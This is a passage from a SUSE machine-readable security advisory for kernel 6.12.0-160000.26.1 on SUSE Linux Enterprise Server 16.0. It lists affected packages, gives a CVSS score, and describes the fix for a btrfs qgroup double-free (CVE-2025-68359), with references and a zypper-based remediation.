"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68356"
},
{
"cve": "CVE-2025-68359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68359"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix double free of qgroup record after failure to add delayed ref head\n\nIn the previous code it was possible to incur into a double kfree()\nscenario when calling add_delayed_ref_head(). This could happen if the\nrecord was reported to already exist in the\nbtrfs_qgroup_trace_extent_nolock() call, but then there was an error\nlater on add_delayed_ref_head(). In this case, since\nadd_delayed_ref_head() returned an error, the caller went to free the\nrecord. Since add_delayed_ref_head() couldn\u0027t set this kfree\u0027d pointer\nto NULL, then kfree() would have acted on a non-NULL \u0027record\u0027 object\nwhich was pointing to memory already freed by the callee.\n\nThe problem comes from the fact that the responsibility to kfree the\nobject is on both the caller and the callee at the same time. Hence, the\nfix for this is to shift the ownership of the \u0027qrecord\u0027 object out of\nthe add_delayed_ref_head(). That is, we will never attempt to kfree()\nthe given object inside of this function, and will expect the caller to\nact on the \u0027qrecord\u0027 object on its own. The only exception where the\n\u0027qrecord\u0027 object cannot be kfree\u0027d is if it was inserted into the\ntracing logic, for which we already have the \u0027qrecord_inserted_ret\u0027\nboolean to account for this. Hence, the caller has to kfree the object\nonly if add_delayed_ref_head() reports not to have inserted it on the\ntracing logic.\n\nAs a side-effect of the above, we must guarantee that\n\u0027qrecord_inserted_ret\u0027 is properly initialized at the start of the\nfunction, not at the end, and then set when an actual insert\nhappens. This way we avoid \u0027qrecord_inserted_ret\u0027 having an invalid\nvalue on an early exit.\n\nThe documentation from the add_delayed_ref_head() has also been updated\nto reflect on the exact ownership of the \u0027qrecord\u0027 object.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68359",
"url": "https://www.suse.com/security/cve/CVE-2025-68359"
},
{
"category": "external",
"summary": "SUSE Bug 1255542 for CVE-2025-68359",
"url": "https://bugzilla.suse.com/1255542"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
